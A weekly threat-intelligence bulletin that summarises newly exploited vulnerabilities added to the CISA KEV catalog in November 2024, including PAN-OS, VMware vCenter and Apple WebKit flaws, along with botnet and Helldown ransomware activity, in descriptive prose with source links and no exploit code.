CISA has added eight new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog this week, including critical flaws in software from Apple, VMware, and Palo Alto Networks emphasizing the urgency for swift mitigation efforts across these platforms.  

Apple has addressed two critical zero-day vulnerabilities actively exploited in the wild, while Palo Alto Networks attributes a key flaw to "Operation Lunar Peek," without disclosing details about the attackers. Meanwhile, Sekoia’s TDR team has identified a Linux variant of Helldown ransomware exploiting a vulnerability in Zyxel firewalls to establish initial access.

The IoT_Reaper botnet remains active, exploiting vulnerabilities in MVPower CCTV DVRs to secure its position in the current threat landscape. Zerobot has redirected its attention to a vulnerability in the Apache HTTP server that has been exposed for three years. In parallel, other persistent botnets like Enemybot, LiquorBot, and Mirai continue to target a nine-year-old flaw in D-Link DIR 645 routers. These activities underscore a significant trend—long-standing vulnerabilities are still prime targets for cybercriminals, emphasizing the ongoing risk of outdated, unpatched systems in the face of evolving threats.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-0012

A critical authentication bypass vulnerability in PAN-OS (CVSS 9.8), now included in the CISA Known Exploited Vulnerabilities (KEV) catalog, enables attackers with network access to the management web interface to escalate privileges to an administrator level. This flaw arises from inadequate authentication in a critical function, providing unauthorized access to perform administrative actions, modify configurations, or exploit related privilege escalation vulnerabilities, such as CVE-2024-9474.

CVE-2024-9474

A command injection vulnerability in PAN-OS enables administrators with access to the management web interface to escalate their privileges and execute commands on the firewall with root-level permissions. While Palo Alto Networks has not explicitly linked CVE-2024-0012 and CVE-2024-9474, the available details suggest the possibility of both vulnerabilities being leveraged in a coordinated exploit chain. This vulnerability has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, emphasizing its critical nature.

CVE-2024-1212

Progress Kemp LoadMaster is affected by a critical command injection vulnerability (CVSS 10), which enables unauthenticated attackers to compromise the management interface, risking the system's security and integrity. This vulnerability, now listed in the CISA KEV catalog, is further escalated by the public availability of a Proof-of-concept (PoC) exploit, making immediate patching a priority.

CVE-2024-8068 & CVE-2024-8069

A privilege escalation to NetworkService Account access and a limited remote code execution with privilege of a NetworkService Account access in Citrix Session Recording Storage Manager. Watch Tower Labs has reported the flaw, and a proof-of-concept (PoC) exploit is now available, increasing the urgency for remediation.

CVE-2024-11120

A critical pre-authentication command injection vulnerability (CVSS 9.8) in GeoVision devices has been actively exploited by a botnet, enabling large-scale DDoS attacks and crypto mining on affected systems, particularly targeting end-of-life models.  

CVE-2024-38812

A critical heap overflow vulnerability rated CVSS 9.8 in VMware vCenter Server and VMware Cloud Foundation enables attackers with network access to trigger remote code execution using specially crafted packets. This issue affects versions 8.0U3a and earlier and has been included in the CISA Known Exploited Vulnerabilities (KEV) catalog.

CVE-2024-38813

A critical privilege escalation flaw in VMware vCenter Server and VMware Cloud Foundation (CVSS 9.8) allows attackers with network access to gain root-level privileges by leveraging specially crafted network packets. This vulnerability affects versions 8.0U3a and earlier and has been included in the CISA Known Exploited Vulnerabilities (KEV) catalog.  

CVE-2024-44308 and CVE-2024-44309

Two actively exploited zero-day vulnerabilities on Intel-based Mac Systems have been resolved by Apple. These include CVE-2024-44309, a cross-site scripting vulnerability targeting Safari's WebKit engine, and CVE-2024-44308, an arbitrary code execution vulnerability linked to JavaScriptCore. Discovered and reported by Google's Threat Analysis Group (TAG), both vulnerabilities have been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.

CVE-2024-21287

A high-severity incorrect authorization vulnerability in Oracle Agile Product Lifecycle Management (PLM) Framework (CVSS 7.5) enables unauthenticated remote attackers to exploit the flaw via HTTP or HTTPS protocols, potentially disclosing files. This issue impacts version 9.3.6 and has been included in the CISA KEV catalog.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

CVE-2024-0012

Palo Alto Networks has linked the exploitation of this specific vulnerability to an operation they have named "Operation Lunar Peek." However, details regarding the threat actor behind these attacks remain undisclosed. The company has shared several indicators of compromise (IoCs), including IP addresses and a hash associated with a PHP webshell payload found on compromised firewalls. Notably, much of the activity has been traced back to IP addresses tied to anonymous VPN services.  

CVE-2024-42057

A high-severity command injection vulnerability (CVSS 8.1) in the IPSec VPN feature of specific firewall versions allows unauthenticated attackers to execute arbitrary OS commands by sending a crafted username to the target device. Sekoia’s Threat Detection & Research (TDR) team has identified the Linux variant of Helldown ransomware leveraging this vulnerability to gain initial access.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2024/11/18/cisa-adds-three-known-exploited-vulnerabilities-catalog  
2. https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/  
3. https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/  
4. https://www.darkreading.com/cloud-security/citrix-patches-zero-day-recording-manager-bugs  
5. https://www.cisa.gov/news-events/alerts/2024/11/21/cisa-adds-three-known-exploited-vulnerabilities-catalog  
6. https://www.cisa.gov/news-events/alerts/2024/11/20/cisa-adds-two-known-exploited-vulnerabilities-catalog
7. https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/
8. https://thehackernews.com/2024/11/apple-releases-urgent-updates-to-patch.html
9. https://blog.sekoia.io/helldown-ransomware-an-overview-of-this-emerging-threat/